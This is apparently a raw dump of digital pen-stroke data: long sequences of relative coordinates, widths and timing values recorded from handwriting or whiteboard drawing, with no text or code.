0 16,-20 0-16,-59 0 15,0 0-15,-20 0 16,-1 0-16,1 0 16,0 0-1,0 0-15,0 0 16,19 0 0,1 0-16,-20 0 15,20 0-15,-20 0 16,19 0-16,-19 0 15,0 0 17,0 0-1,0 0 0,-1 0 0,1 0-15,0 0 0,59 0-16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39.6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81 14429 0,'17'-18'15,"1"0"-15,17 1 16,-17 17-16,52-18 15,19 18 1,316-18 0,495 18 15,-283 0-15,-282 0-1,-35 0-15,35 0 16,-88 0-16,194 0 15,-264 0 1,-54 0-16,-17 0 16,-53 0-16,18 0 15,-36 0 1,0-17 46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3:41.0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75 15893 0,'0'-18'47,"35"0"-32,36 1-15,17-19 16,18 36-1,494-35 1,123 35 15,53 0-15,-4621 0 0,8307 0-1,-8148 0 1,4003 18 31,3811-18-47,-4111 0 15,1 0-15,0 0 16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5:23.4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790 12612 0,'17'-18'16,"1"18"-16,35-17 15,0 17-15,35 0 16,35 0-16,1 0 16,17 0-16,0 0 15,18 0-15,-18 0 16,0 0 0,-18 0-16,-17 0 0,-17 0 15,-1 0-15,18 0 16,-18 0-16,35 0 15,18-36-15,-17 36 16,52-35-16,-35 17 16,36 1-16,17-1 15,17 0 1,-17 18-16,18 0 0,17 0 16,336 0 15,-406 0-31,123 0 15,-176 0 1,-53 0-16,-18 0 16,-18 0-1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5:26.4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41 14270 0,'18'0'31,"17"0"-15,-17 0-1,-1 0-15,36 0 16,-17 0-16,16 0 16,19 0-1,0 0-15,52 0 16,0 0-16,1 0 16,17 0-16,18 0 15,-18 0-15,18 0 16,-18 0-16,-18 0 15,1 0-15,-18 0 16,123 18 0,-141-18-16,36 17 15,-1-17-15,0 0 16,-17 0-16,0 0 16,0 0-16,0 0 15,-36 0-15,1 0 16,-1 0-16,-34 0 15,52 0 17,-53 0 15,0 0-32,-17 0-15,35 0 16,-18 0-16,1 0 15,-1 0 1,18 0-16,-36 0 16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00.3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235 15859 0,'18'0'78,"19"0"-78,-1-30 0,19 30 16,17-32-1,1 32-15,0 0 16,19 0-16,16 0 16,21 0-16,-2 0 15,-18 0-15,19 0 16,18 0-16,-19 0 15,19 0-15,-18 0 16,-18 0-16,35 0 16,1 0-16,-19 0 15,19 0-15,-18 0 16,-1 0-16,-17 0 16,-1 0-16,-35 0 15,-2 0-15,2 0 16,-2 0-16,1 0 15,-18 0-15,0 0 16,72 0 0,-54 0-16,0 0 15,18 0-15,-18 0 16,0 0-16,18 0 16,-36 0-16,18 0 15,55 0 1,17 0-1,-90 0 1,0 0-16,17 0 16,-17 0-16,55 0 15,-56 0 1,19 0-16,-18 0 16,18 0-16,18 0 15,-18 0-15,0 0 16,0 0-16,-18 0 15,17 0-15,2 0 16,-20-31-16,73 31 16,-72 0-1,0 0-15,0 0 16,0 0-16,-1 0 16,56 0-1,-56 0 1,-36 0-1,1 0-15,-2 0 16,2 0-16,0 0 16,-2 0-16,20 0 15,0 0-15,17 0 16,-17 0 0,72 0-1,-73 0-15,19 0 16,-36 0-16,-2 0 15,20 0-15,0 0 16,-19 0-16,0 0 16,19 0-16,-19 0 15,0 0-15,0 0 16,0-32-16,19 32 31,0 0-31,-20 0 0,2 0 16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38:24.2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98 10279 0,'0'39'47,"0"1"-47,0 0 0,0 0 16,-60 19-16,21 1 15,-21-41 1,-19 41-16,-40 19 15,-20 1-15,-40 59 16,21-40-16,-41 40 16,1 0-16,118-80 15,-118 140-15,59-41 16,-40 1-16,80-99 16,40 19-16,39-39 15,0-1-15,0 1 16,20 0-16,0-20 15,0 19-15,0 21 16,0-1-16,0 1 16,0-40-16,0 19 15,0 1-15,0-20 16,20-20 0,0 20-16,19 0 15,-19-20-15,20 39 16,19-19-16,-19 0 15,-20 0-15,0-20 79,-20-20-64,0-20-15,0-19 16,0-80-16,20 0 15,-20-79-15,0-20 16,0-20-16,0-20 16,0-20-16,0 40 15,0 179-15,0-219 16,0 60-16,0 40 16,-80-21-16,41 41 15,19 79-15,-20 39 16,40 40-16,0 60 47,-20 0-32,-39 158-15,39 0 16,-79 120-16,39-40 16,-59 138-16,99-78 15,-39 118-15,-21-19 16,41-140-16,-61 120 15,21 0 1,39-60-16,21-218 0,19 139 16,0-60-1,0-39-15,0-60 16,0-60-16,0-39 16,0 0-16,19-20 46,1 0-30,0 0 0,0 0-1,0 0-15,0 0 16,39 0-16,1-60 16,59-79-16,0-59 15,40-20-15,39-20 16,40-139-16,80-60 15,78-59-15,-296 357 16,177-298-16,61-78 16,-40 118-16,-179 99 15,-20 60-15,-40 39 16,-39 100-16,0 20 16,-20 59-16,20 0 15,-20 0 110,0-19-109,0-1-16,0 0 15,0-19-15,0 19 16,0-19-16,0-1 16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12.1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69 5574 0,'-53'0'63,"-18"0"-63,-52 53 15,-1-18-15,18-17 16,1 17-1,-1 18-15,0 0 0,-53 53 16,-17-18-16,17 18 16,-123 52-1,88 1 1,176-106 0,0-18-16,1 1 15,17-19 1,0 1-1,17-18-15,1 18 16,88-1-16,53 19 16,52-1-16,36-18 15,-17 19-15,-19-19 16,19 36-16,-54-35 16,-35 0-16,-35-18 15,-36 0-15,-34 0 16,-19 0-16,1-18 15,-18 0-15,0-35 16,0-17-16,0-18 16,0-36-16,-71-17 15,-17-35-15,-106-160 32,88 195-32,36 36 0,17 34 15,0 0-15,35 36 16,1 18-1,-1-19-15,0 19 16,1-19-16,-1 19 16,1 17-1,-1 0 17,-17 17-32,17 36 15,-35 106 1,18-18-16,17 0 15,-17 71-15,-36 0 16,36 34-16,17-16 16,-17 158-1,35-282-15,0-36 16,0 89 0,18 17 15,-1-140-16,1-19-15,-18 1 32,18-18-17,-1-53-15,19-70 16,-1-1 0,0-35-16,36-88 15,317-546 1,88 69-1,-229 425 1,0 34-16,-141 89 16,0 52-16,-106 89 15,0 52 32,0 1-31,0 0-16,0-1 15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13.8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81 4269 0,'0'-18'16,"0"0"15,36 18-15,16-17-16,37-1 15,387-35 1,-264 53 0,-1-17-16,-17-1 15,-17-17 1,-36-18-16,0 17 15,0 1 1,-123 35-16,-1 0 16,1 0-1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28.7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8 9507 0,'18'0'46,"-18"-17"-30,17 17 0,1 0-16,0 0 0,-1 0 31,36 0-31,-18 0 16,1 0-16,17 0 15,52 0 1,-34 0-16,17 0 15,36 0 1,-1 0-16,-17 0 0,17 0 16,1-18-16,-36 18 15,177 0 1,-1 0 0,-105 0-16,17 0 15,-17 0-15,53 0 16,176 0-1,-194 0 1,159-35-16,-230 17 16,-70 1-16,-18 17 15,-17 0-15,0 0 125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29.9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06 9225 0,'0'-17'62,"53"17"-62,17 0 16,54 0-1,35-36-15,-1 36 0,-17 0 16,36 0-16,-36 0 16,-18 0-16,-52 0 15,-1 0-15,-34 0 32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42.4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86 15180 0,'19'0'32,"21"0"-17,20 0-15,19 0 16,40 0-16,-79 0 15,79 0-15,40 0 16,-20 0-16,-20 0 16,20 0-16,-1 0 15,1 0-15,-20 0 16,20 0-16,20 0 16,-20 0-1,20 0-15,-1 0 16,1 0-16,0 0 15,-60 0-15,20 0 16,-59 0-16,-21 0 16,-19 0-1,0 0-15,0 0 16,0 0 0,0 0-16,-1 0 15,1 0-15,0 0 16,-20-20 62,20 20-62,-20-19-16,20 19 15,-20-20 1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0.5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0 11060 0,'-18'17'46,"53"-17"-14,36 0-17,17 18-15,71-1 16,-18 1-16,18-18 16,-1 0-16,125 0 31,-160 0-31,-17 0 0,-53 0 15,-18 0-15,0 0 16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1.5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50 11218 0,'18'0'47,"17"0"-47,18 0 16,0 0-16,35 0 16,-17 0-16,17 0 15,35 0-15,-34 0 16,-37 0-16,19-17 15,-36 17-15,1-18 16,-19 18 15,1 0-31,-1 0 16,19 0-16,-1 0 16,18 0-16,-18 0 15,0 0-15,18 0 16,-17-18-1,34 18-15,-34-17 16,-19 17-16,1 0 16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2.8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40 10918 0,'-18'0'47,"-35"0"-47,0 0 15,-17 0-15,-1 0 16,18 0-16,-35 18 16,0-18-16,17 18 15,-17-1-15,0-17 16,-177 0 0,107 0-16,-36 0 15,0 0-15,-53 0 16,-18 0-16,53 0 15,1-17-15,-1-1 16,53 18-16,18 0 16,71 0-16,34 0 15,1 0-15,53 0 328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4.4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73 12876 0,'-17'0'32,"-1"0"-1,-17 0-15,-18 0-1,0 0-15,0 0 0,-17 18 16,-1 0-16,-35-1 15,-352 19 17,299-1-17,-18-17-15,1-18 16,-36 0-16,1 0 16,-54 0-16,54 0 15,-248 0 1,212 0-16,35 0 15,-35 0-15,36 17 16,70-17-16,-142 0 31,266 0-15,-1 0 0,0-17-1,-70 17 1,35 0-1,-17-18-15,17 18 16,0 0-16,0 0 16,18 0-16,-18 0 31,18 0-31,17 0 31,0 0-31,-17 0 16,0-18-16,-18 18 15,-18-17-15,18 17 16,18 0-16,-18-18 31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7.5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59 12753 0,'17'0'47,"19"0"-31,-1 0-16,0 0 16,18 0-16,0 0 15,0 0-15,0 0 16,17 0-16,-17 0 15,36 0-15,69 0 16,-87 0 0,35 0-16,-18 0 15,0 0-15,36 0 16,-36 0-16,35 18 16,1-1-16,17 1 15,0-1-15,-18 19 16,18-19-16,18 1 15,-18 0-15,-52-18 16,34 0-16,-35 0 16,-17 0-16,17 17 15,-17-17-15,-1 0 16,18 0-16,0 0 16,-17 0-16,0 0 15,17 0-15,0 18 16,0 0-16,-17-18 15,35 0-15,-36 17 16,1-17 0,35 0-16,-54 18 15,19-18-15,-18 0 16,0 0-16,17 0 16,-34 0-16,17 0 15,-18 0-15,18 0 16,17 0-16,-17 0 15,18 0-15,-18 0 16,17 0-16,36 0 31,-53 0-15,-35 0-16,-1 0 16,1 0-1,0 0 1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49.7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8 14640 0,'0'-17'31,"17"17"0,36 0-31,36 0 16,-1 0-16,35 0 15,18 0 1,0 0-16,-17 0 0,-1 0 16,-52 0-16,-1 0 15,-17 0-15,0 0 16,18 0-16,-36-18 15,36 18 17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6:51.3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03 14746 0,'0'18'47,"35"-18"-47,36 0 15,35 0-15,-18 0 16,53 0-16,0 0 16,71 35-1,-1-17-15,36 17 0,18 0 16,-36 18-16,36-18 15,264 36 17,-423-53-17,-124-18 282,-17 0-281,17 0-1,1-18 1,17 0 0,0 1-1,0-1 1,17 0-16,36 1 16,0-19-16,18 1 15,-18 35-15,35-17 16,18-1-16,-36 0 15,36 1-15,-18 17 16,177 0 0,-142 0-16,-35 0 15,18 0-15,-35 17 16,-36-17-16,18 0 16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11.2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53 14640 0,'35'0'62,"53"0"-62,36 0 16,52 0-16,18 0 15,18 0-15,17 0 16,0 0-16,18 0 16,0 0-16,-35 0 15,0 0-15,-18 0 16,-18 0-16,0 18 15,71 17 1,-158-17 0,34-1-16,-52-17 0,34 36 15,-34-19 1,17 19-16,-53-36 0,18 0 16,0 17-1,0-17-15,-17 0 16,-1 0-16,0 0 15,-17 0 1,-1 0 0,1 0-1,0 0 17,-18-17-1,17-1 0,-17 0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21.8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22 1005 0,'0'0'0,"-36"0"16,1 36-16,-53 17 15,-230 158 1,142-70 0,-53 36-16,-18-1 0,35 18 15,-88 53 1,53-35-1,141-177 1,-17 36-16,17-36 16,-35 53-16,88-53 15,-35 36-15,35 17 16,53-53-16,-18 18 16,18 0-16,0 71 31,36-89-31,16 18 0,37 0 15,-1-18-15,53 36 16,35-18-16,1 17 16,-1-17-16,18-35 15,-17-1-15,-19-17 16,-17 0-16,-52 0 16,69-141 15,-140 88-16,-18-70-15,0-36 0,-18-35 16,-70-18-16,-265-423 31,159 353-31,-53-53 16,36 35-16,17 88 16,-36-87-16,36-1 15,71 106-15,-1 35 31,124 177 1,0 87-17,0 107-15,89 35 16,-36 0-16,35 0 16,53 564-1,-88-493 1,-53-89-16,0 36 15,0-36-15,0-17 16,0-36 0,0 106-1,17-123-15,1-88 0,-18-18 16,0-36-16,0 18 16,18-35-16,-1 0 46,1-17-30,0-36-16,-1 18 16,36-36-16,-35 1 15,35-1-15,0 0 16,0-34-16,17-19 16,1 18-16,-1-52 15,18-36-15,1-18 16,16-70-16,37-106 15,34-106-15,-88 106 16,36 52-16,-19 107 16,-52 88-16,18 35 15,-36 71-15,-35 17 16,0 54 46,0 17-62,18-36 16,-1 18 0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30.9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76 13670 0,'17'0'47,"54"0"-31,35 0-16,70 0 15,1 0-15,17 0 16,35 0-16,283 0 16,-230 0-1,18 0-15,-53 0 16,246 0-1,-351 0-15,-54 0 16,-71 0 3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47.3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21 16430 0,'20'0'219,"0"0"-219,20 0 15,19 0-15,1 0 16,19 0-16,0 0 16,41 0-16,-21 0 15,0 0-15,0 0 16,-19 0-16,-1 0 15,0 0-15,-19 0 16,39 0-16,-59 0 16,39 0-16,0 0 15,1 0-15,-21 0 16,1 0-16,-20 0 16,-1 0-1,-19 0-15,0 0 0,0 0 16,0 0 15,0 0-15,-1 0-1,1 0 1,0 0-16,20 0 16,-20 0-16,19 0 15,-19 0-15,20 0 16,-20 0-16,-1 0 15,1 0-15,0 0 16,0 0-16,0 0 16,0 0-16,19 0 15,21 0-15,19 0 16,-19 0-16,19 0 16,-19 0-16,19 0 15,-39 0-15,-1 0 16,-19 0 15,0 0-15,0 0-1,0 0 1,0 0 0,0 0-1,-1 0 95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33.5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92 16104 0,'0'0'0,"17"0"15,19 0-15,-1 0 16,0 0-16,230 0 47,-36 0-47,-105 0 16,17 18-16,-18-18 15,36 0-15,0 0 16,17 0-16,-17 0 15,-18 0-15,0 0 16,-35 0-16,0 0 16,-36 0-1,19 0-15,-54 0 16,18 0-16,-18 0 16,88 0-1,-70 0-15,18 0 16,-1 0-16,-17 0 15,18 0-15,-36 0 16,18 0-16,0 0 16,0 0-16,0 0 15,0 0-15,0 0 16,-18 0-16,-17 0 16,-1 0-16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40.3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06 13511 0,'18'0'78,"0"0"-78,17 0 16,0 0-16,36 0 15,-1 0-15,36 0 16,18 0-16,-36 0 16,53 0-16,-18 0 15,19 0-15,-19 0 16,36 18-16,-36 0 16,-35-1-16,-35-17 15,0 18-15,-17-18 16,-19 0-16,1 0 47,-1 0-32,19 0 1,-1 0-16,-17 0 16,-1 0-16,1 0 15,0 0 1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46.9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58 16122 0,'0'0'0,"53"0"15,18 0-15,-1 0 16,54 0 0,-36 0-16,35 0 15,1 0-15,17 0 16,-18 0-16,19 0 15,-1 0-15,247 0 32,-124-18-17,-123 18-15,0 0 16,36 0-16,-36 0 16,-35 0-16,17 0 15,124 0 1,-159 0-16,-17 0 15,-18 0-15,0 0 16,-18 0-16,-17 0 16,-1 0-1,1 0 32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13.1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18 7501 0,'39'0'62,"-19"0"-46,40 0-16,-1 0 16,40 0-16,21 0 15,38 0-15,1 0 16,-20 0-16,40 0 16,-21 0-16,-19 0 15,20 0-15,-20 0 16,20 0-16,-1 0 15,-118 0-15,99 0 16,0 0-16,20 0 16,-1 0-1,-19 0-15,20 0 0,0 0 16,-1 0 0,1 0-16,-20 0 15,-40 0-15,1 0 16,19 0-16,0 0 15,-40 0-15,20 0 16,1 0-16,19 0 16,-80 0-16,60 0 15,40 0-15,-59 0 16,19 0-16,0 0 16,-39 0-16,-21 0 15,21 0-15,-20 0 16,-1 0-16,1 0 15,20 0-15,-1 0 16,1 0-16,-1 0 16,21 0-16,-21 0 15,1 0-15,-41 0 16,100 20-16,-39-20 16,-1 0-16,-19 0 15,-1 0-15,1 0 16,-1 0-16,-19 0 15,0 0 1,-20 0-16,19 0 16,-19 0-1,0 0 1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15.1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60 7521 0,'-20'0'32,"0"19"-17,20 1-15,-19-20 16,-21 20-1,20-20-15,-39 20 16,-1-20-16,-39 0 0,-20 0 16,20 0-1,-60 0-15,20 0 16,99 0-16,-59 0 16,20 0-16,19 0 15,1 0-15,-1 0 16,-19 0-16,39 0 15,0 20-15,1-20 16,19 0-16,0 20 16,0-20-1,0 0 1,0 0 15,0 0-31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16.6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95 7540 0,'20'0'47,"99"0"-31,59 0-16,60 0 15,20 0-15,40 0 16,-40 0-16,20 0 16,19 0-16,21 0 15,59 0-15,-40 0 16,-19 0-16,79 0 16,-278 0-1,278 0-15,-60 0 16,-59 0-16,19 0 15,-39 0-15,-20 0 16,-19 0-16,-41 0 16,-19 0-16,-20 0 15,0 0-15,-99 0 16,19 0-16,-39 0 78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18.0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26 8711 0,'-20'0'78,"-19"-20"-62,-21 0-1,-59 1-15,-40 19 16,-39 0-16,-60 0 15,-119-40-15,-60 40 16,60 0-16,20-40 16,20 20-16,79-19 15,0-1-15,40-19 16,19-1-16,1 40 16,138 20-16,-99-20 15,1 20-15,19-39 16,0 39-16,59 0 15,21 0-15,39 0 16,-20 0-16,21 0 16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19.1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731 8751 0,'0'-20'16,"20"20"15,0 0-16,20 0-15,-1 0 16,21 0-16,39 0 16,80 0-16,19 0 15,60 0-15,-20 0 16,80 0-16,-179 0 16,218 0-16,20 0 15,0 0-15,0 0 16,20 0-16,-119 0 15,39 0-15,60 0 16,119 0-16,0 0 16,80 0-16,-21 0 15,41 0-15,-61 0 16,-58 0-16,-140 0 16,-39 0-16,-100 0 15,-138 0-15,39 0 16,-59 0-1,-40-20-15,19 20 16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20.6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00 9723 0,'-20'0'110,"0"0"-110,0 0 15,-19 0 1,-41 0-16,-79 0 16,21 0-16,-81 0 15,-19 0-15,20 0 16,0 0-16,59 0 16,20 0-16,60 0 15,39 0-15,20 0 16,0 0-16,0 0 15,1 0 1,-1 0 0,0 0-1,0 0 1,0 0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21.9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36 9664 0,'20'0'78,"39"0"-62,120 0-16,119 0 15,138 0-15,100 0 16,158 0 0,60 0-16,-476 0 15,476 0-15,159 0 16,-218 0-16,-40 0 16,-239 0-16,-178 0 15,-99 0-15,-99 0 16,-20 0 109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49.1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57 16430 0,'0'0'0,"79"0"15,20 0-15,-19 0 16,39 0-16,-40 0 16,20 0-16,-19 0 15,39 0-15,-20 0 16,40 0-16,-40 0 16,20 0-16,-40 0 15,-59 0-15,40 0 16,-21 0-16,-19 0 15,0 0 1,0 0 0,0 0-1,0 0 1,19 0-16,-19 0 16,0 0-1,0 0 1,0 0-16,-20-19 0,39 19 15,1 0-15,0-20 32,-20 20-32,-1 0 15,1-40-15,0 40 16,0-20 0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0.6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13 1535 0,'71'0'62,"53"0"-62,17 0 16,35 0-16,36 0 16,88 17-1,440 19 1,-263-36-16,-54 0 16,106 0-16,0 0 15,494 17 1,-599 71-16,-72-70 15,-52 35-15,-35-53 16,-18 0-16,-53 0 16,141 0-1,-247 0-15,-35 0 16,-35 0-16,-1 0 62,-17 18-30,0-1 30,-17-17-46,-36 0-16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1.7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22 4286 0,'36'0'47,"-1"0"-47,53-17 16,18 17-16,70 0 15,36 0-15,370 0 16,-194 0 0,88 0-16,1 0 15,-125 0-15,230 0 16,-352 0-1,-36 0-15,-36 0 16,-52 0-16,-35 0 16,-18 0-1,-36 0-15,1 0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3.4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14252 0,'-18'0'15,"-17"0"-15,17 0 16,0 0 0,-17 0-16,-18 0 0,36 0 15,-19 0-15,1 0 16,-18 0-16,-18 0 16,1 0-16,-36 0 15,18 0-15,-36 0 16,36 0-1,18 0-15,17 0 16,0 0-16,35 0 16,18-17-16,-17 17 31,-1 0-31,0 0 16,-88 0-1,54-18-15,-19 18 16,0 0-16,19-18 15,-54 1 1,88 17-16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4.3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21 16492 0,'18'0'15,"-53"18"1,-18-18 0,-18 0-16,-17 0 15,0 18-15,-36-18 16,36 0-16,-35 0 15,-71 0 1,17 17 0,142 1-1,0-18-15,-1 0 16,19 0-16,-1 0 16,-17 0-1,-18 0 1,35 0-1,-17 0-15,0 0 0,-1 0 16,-34 0 0,52 0-1,1 0-15,-1 0 47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5.9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98 14252 0,'0'18'16,"0"0"-16,17-1 15,1-17-15,35 18 16,0-18-16,17 0 16,1 17-16,35 1 15,-18 0-15,18-18 16,0 0-16,35 0 15,-18 0 1,18 0-16,36 0 0,-36 0 16,18 0-16,140 0 31,-158 35-31,-35-35 0,-70 0 16,-19 18-16,-34-18 62,-1 0 16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7.5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61 16933 0,'0'0'0,"89"0"0,16 0 16,37 0-16,34 0 15,-17 0-15,35 0 16,-53 0-16,0 0 15,-35 0-15,0 0 16,52 0 0,-105 0-16,-17 0 15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7:59.9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49 14270 0,'35'0'47,"53"35"-47,53 0 15,18 1-15,0-19 16,35 1-16,-53 0 15,18 17-15,-54-35 16,-16 0-16,-36 0 16,-1 0-16,-34 0 15,-18 18 48,18-1 156,35-17-219,70 0 15,18 0-15,0 0 16,-17 0-16,35 0 31,-107 0-31,-16 0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8:08.4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781 16880 0,'0'-17'16,"-53"17"31,1 0-47,-1 0 15,0 0 1,-18 0-16,-17 0 15,0 0-15,0 0 16,-1 0-16,1 0 16,-18 0-16,-17 0 15,17 0-15,-17 0 16,-1 0-16,36 0 16,-18 0-16,36 0 15,-1 0-15,0 0 16,36 0-16,-35 0 15,-54 0 1,71 0-16,18 0 16,0 0-16,-1 0 15,1 0-15,17 0 16,1 0 0,-1-18-1,1 18 1,-19 0-16,19-17 15,-19 17-15,1 0 16,-18 0 0,18 0-1,17 0 1,1 0-16,-1 0 16,0 0-1,1-18 1,-1 18-16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8:09.5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268 14517 0,'18'0'62,"17"0"-62,54 0 16,34 0-1,-35 0-15,18 0 16,0 0-16,17 0 16,1 0-16,-1 0 15,-34 0-15,-1 0 16,35 0-16,-17 0 15,-18 0 1,36 0-16,-18 0 0,17 0 16,-17 0-16,53 17 31,-106-17-31,-36 0 0,1 0 16,-18 18-1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6:42.9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98 723 0,'-36'0'31,"-34"0"-16,-54 18-15,-70 70 16,18 35-16,-1 19 16,-70 69-16,-52 54 15,-19-18-15,-17 17 16,-35 36-16,-19 53 16,107-88-16,-53 105 15,212-229-15,17 0 16,88-70-16,18-18 15,18 17-15,105 1 16,36-1-16,123 36 16,247 35-16,106-70 15,36-36 1,-36-35-16,-159 0 0,-123-35 16,-89-71-16,-17-53 15,-106 36-15,18-36 16,-71-70-16,-52-1 15,-36 1-15,-18-18 16,-88 0 0,-17 53-16,-107-88 0,-122-53 15,-125 53 1,-122 17-16,-72 53 16,-140 1-16,52 17 15,36-36-15,88 19 16,230 123-16,140 70 15,71 18-15,70 18 16,19 52-16,52 36 16,17 53-1,36 88-15,0 0 0,53 52 16,141 125-16,124 175 16,105 72-16,1-89 15,-1 35-15,-17-123 16,-124-106-1,-88-53-15,-53-70 0,-70-71 16,-19-18-16,-34-88 16,-18-35-1,0-123 17,0-89-17,0-35-15,18-53 16,17-17-16,18-142 15,-18 159-15,36-18 16,17-35-16,71-105 16,70-54-16,18 36 15,0 52-15,35-17 16,-106 141-16,1-17 16,-89 123-16,-35 0 15,-18-18-15,-35 18 16,0 0-16,0 35 15,-17 35-15,-54-35 16,36 54-16,-18-37 16,0-17-16,0 54 15,35-19-15,-17 71 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8:46.5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195 4227,'18'0,"1"0,-1 0,36 0,1 0,-1 0,37 0,18 0,36 0,0 0,0 0,18 0,37 0,-37 0,0 0,1 0,-55 0,-19 18,-35-18,-37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50.3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748 16470 0,'39'0'47,"1"0"-32,19 0-15,-19 0 16,59 0-16,40 0 16,20 0-16,-20 0 15,-20 0-15,0 0 16,-20 0 0,-19 0-16,-21 0 0,1 0 15,-21 0 1,1 0-16,0 0 15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3:50.6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33 6072 0,'20'0'93,"-1"0"-77,1 0 0,0 0-16,0 0 15,0 0 1,0 0-1,0 0 1,-1 0 0,1 0-1,0 0 17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4:25.9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681 6290 0,'0'-20'0,"0"1"15,20-1 1,-1 20 15,1-20-15,0 20-16,20-20 15,-20 20-15,19 0 16,-19 0-16,40 0 16,-1-20-16,41-20 15,38 21-15,-38-1 16,39 20-16,-1 0 16,21 0-16,0 0 15,0 0-15,19 0 16,-19 0-16,-80 0 15,120 0-15,-21 0 16,-39 0-16,-20 0 16,-19 0-16,-21 0 15,0 0 1,-19 0-16,-20 0 16,19 0-16,1 0 0,-1 0 15,-19 0-15,0 0 16,-1 0-1,1 0-15,-20 0 16,0 0-16,-1 0 16,1 0-1,0 0-15,0 0 47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4:26.9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502 6092 0,'20'0'32,"0"0"-17,39 0-15,21 0 16,-41 0-16,120 0 16,79 0-16,80 0 15,237 0-15,-19 0 16,60 0-16,-1 0 15,-59 0-15,-159 0 16,-40 0-16,-139 0 16,-39 0-16,-40 20 15,-59-1-15,-21-19 16,1 0 0,-20 0-1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8:19.1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71 1940 0,'0'0'0,"35"0"15,-17 0 1,-1 0-16,1 0 15,17 0-15,1 0 16,16 0-16,19 0 16,35 0-16,17 0 15,-17 0 1,71 0-16,-1 0 0,18 0 16,18 0-1,17 0-15,36 0 0,-18 0 16,-18 0-16,35 0 15,-34 0 1,-1 0-16,0 0 0,177 0 31,-212 0-31,18 0 0,-36 0 16,18 0 0,-35 0-16,-36 0 15,18 0-15,-52 0 16,16 0-1,-69 0-15,-1 0 16,-17 18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8:20.5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92 4516 0,'18'0'16,"-18"17"-1,-18 1 1,-17-18 0,-18 0-16,-17 0 0,-36 0 15,18 0-15,-18 0 16,0 0-16,-35 0 15,17 0-15,36 0 16,-18 0-16,18 0 16,-18 0-1,36 0-15,-1 0 16,-17 0-16,35 0 16,18 0-16,17 0 15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8:22.9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458 4392 0,'89'0'78,"34"0"-63,18 0 1,36 0-16,70 0 16,-18 0-16,53 0 15,18 0-15,35 0 16,0 0-16,-4074 0 16,8113 0-16,-4003 0 15,17 0-15,-88 0 16,193 0-1,-281 0-15,-53 0 16,-18 0-16,-53 0 16,-35 0-16,-18 0 15,1 0-15,-19 0 63,1 0-32,0 0-31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5:03.7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94 6270 0,'0'-19'46,"20"19"-30,39 0 0,40 0-16,80 0 15,59 0-15,20 0 16,40 0-16,-20 0 16,19 0-16,21 0 15,-60 0-15,-20 0 16,-20 0-16,-19 0 15,-41 0-15,41 0 16,-80 0-16,-79 0 16,59 0-16,-40 0 15,-19 0-15,-20 0 16,0-20 31,0 20 15,-1 0-62,61 0 16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39:53.1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74 4445 0,'-18'0'63,"-70"0"-48,0-18-15,-35 18 16,-1 0-16,1-17 15,34-1-15,1 0 16,18 18 0,17 0-16,0 0 0,0 0 15,18 0 1,-18 0-16,17 0 16,-34 0-16,-1 0 15,18 0-15,-17 0 16,-1 0-16,36 0 15,-18 0-15,0 0 16,36 0-16,-1 0 16,0 0-16,-17 0 15,-18 0-15,18 0 16,-18 0-16,0 0 16,0 0-16,18 0 15,-1 0-15,19 0 16,-1 0-16,1 0 15,-1 0-15,0 0 94,1 0-78,-1 0-1,0 0 17,1 0-17,17 18-15,-36 0 16,19-18 0,-18 17-16,-1 1 15,19-18 1,-1 0-16,-17 0 15,17 0 1,-17 0-16,17 0 16,1 0-16,-19 0 15,19 0-15,-1 0 16,0 0 31,1 0-32,-1 0-15,-17 0 16,-1 0-16,-16 0 16,-1 0-16,17 0 15,-17 0-15,36 0 16,-1 0 0,1 0-16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0:25.4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3 7708 0,'0'0'0,"-17"0"94,-1 0-78,-17 0 15,17 0-31,-17 0 15,-18 0-15,0 0 16,0 0 0,18 0-16,17 0 15,-17 0-15,0 0 16,17 18 15,-17-18-15,-1 0-16,1 0 15,17 0-15,-17 0 16,0 0-16,17 0 16,1 0 62,-1 0-63,0 0-15,1 0 32,-1 0-1,0 0 78,1 0-46,-1 0-16,0 0-32,1 0-15,-18 0 16,17 0-16,0 0 16,1 0-16,-1 0 31,0 0 31,1 0-15,-1 0-47,0 0 16,1 0-16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6:50.6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79 1676 0,'89'0'46,"69"-36"-30,142 1-16,18-18 16,140 0-16,71 53 15,36 0-15,87-88 16,-122 88-16,16-88 16,1 70-16,-53-17 15,35 0-15,53 17 16,-105 18-16,105 0 15,0-35-15,-71-18 16,36 0 0,-53 0-16,-106 18 15,53 35-15,-141-18 16,35 18-16,-70 0 16,-54-18-16,-70 18 15,-70 0-15,-36 0 16,1 0-16,-19 0 109,18 0-109,-17 0 16,17 0-1,1 0-15,-19 0 16,1 0-16,-18 18 63,0 0-63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51.7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241 16549 0,'19'0'31,"1"-19"-15,20 19-16,20 0 15,39 0-15,40 0 16,0 0-16,-1 0 15,-18 0-15,-1 0 16,-20 0-16,20 0 16,-20 0-1,-20 0-15,1 0 16,-40 0-16,-1 0 16,1 0-16,-20 0 15,0 0 1,-1 0-1,1 0-15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6:55.3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12 7532 0,'17'0'16,"1"0"15,0 0-31,17-18 16,18 18-1,17 0-15,36 0 16,71 0-16,-1 0 16,71 0-16,70 0 15,160 0-15,52 0 16,53 0-16,88 0 16,89 0-16,-1 0 15,-35 0-15,1 0 16,-54 0-16,-53 0 15,-194 0-15,18 0 16,-176 0-16,-89 0 16,-34 0-16,-37 0 15,-87 0 32,-18 18 63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5:56.4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61 4346 0,'0'19'31,"20"-19"-31,39 20 15,-19-20-15,59 0 16,40 0-16,20 0 16,39 0-16,40 0 15,60 0-15,-40 0 16,-20 0-16,20 0 16,-40 0-16,20 0 15,-19 0-15,59 0 16,-21 0-16,-157 0 15,138 0-15,0 0 16,-40 0-16,-79 0 16,1 0-16,-41 0 15,-20 0 1,-39 0-16,0 0 0,0 0 16,0 0-1,0 0 1,-1 0-1,1 0-15,-20 20 16,20-20-16,0 20 16,0-20-1,20 20 1,-1-20-16,1 20 16,0-20-16,19 19 15,20-19-15,-19 0 16,19 0-16,-19 0 15,-20 0-15,-21 0 16,1 0-16,0 0 16,20 0-1,19 0-15,1 0 16,19 0-16,1 0 16,-41 0-16,1 0 15,-20 0 48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5:59.5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17 5834 0,'20'0'16,"0"0"-1,0 20-15,19 19 16,41-19-16,-61 20 15,41-20-15,59 19 16,0 1-16,0 0 16,-20-20-16,-19-1 15,39 1-15,0 0 16,-79-20-16,-1 0 16,-19 0-1,0 0 1,0 0 78,0 0-79,0 0 1,-1 0-16,1 0 15,20 0 1,0 0-16,19 0 16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7:04.1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31 13970 0,'19'0'78,"1"0"-78,20 0 16,59 0-16,40 0 16,-20 0-16,20 0 15,-60 0-15,-39 0 16,0 0-16,-20 0 15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7:47.1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033 14922 0,'0'20'109,"40"-20"-109,19 